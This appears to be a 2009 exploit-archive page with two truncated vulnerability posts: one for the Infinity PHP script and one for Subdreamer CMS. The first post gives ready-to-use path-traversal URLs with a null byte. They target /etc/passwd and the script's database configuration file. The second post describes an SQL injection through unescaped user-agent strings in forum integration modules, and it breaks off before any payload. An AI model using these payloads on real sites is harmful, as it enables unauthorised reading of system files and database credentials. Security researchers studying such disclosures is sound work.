Home » 2009 » August » 22
Infinity <= v2.X.X (Local File Disclosure/Auth Bypass) Vulnerabilities
-----------------Infinity <= v2.X.X (Local File Disclosure/Auth Bypass) Vulnerabilities---------------
----------
Script : Infinity
version : 2.X.X
Language: PHP
Site: http://www.dimofinf.net/
Author: SwEET-DeViL

need magic_quotes_gpc = Off  <-----(<>

----------------------------------------------------------------------------------------------------------------

- +[Local File Disclosure]
#Exploit:



http://WWW.Site.Com/inf/?options[langfile]=../../../../../../etc/passwd%00


http://WWW.Site.Com/inf/?options[style_dir]=../include/db.php%00


#
###
... Read more »
Views: 8863 | Added by: apeh1706 | Date: 22 August 2009 | Comments (0)

SQL Injection vulnerabilities in Subdreamer CMS
Background information:


This report applies to Subdreamer newest stable release, 2.5.3.2 hotfix#5.

Subdreamer is a content management system, which is written in PHP and uses MySQL as its database backend. Subdreamer's home page is http://www.subdreamer.com

Subdreamer can be integrated with different forum software, so that login authentication & authorization information can be used in the CMS too.

Vulnerability description:


There are vulnerabilities in two integration modules in Subdreamer. Both Invision Power Board 2 and phpBB3 integration modules have this vulnerability.

Both bulletin board systems store browser user-agent string in the sessions table used to track currently logged in users.

The user-agent string is passed as-is from HTTP headers without any validation / escaping. This opens up a possibility for SQL Injection attacks.


P ... Read more »
Views: 8432 | Added by: apeh1706 | Date: 22 August 2009 | Comments (0)

close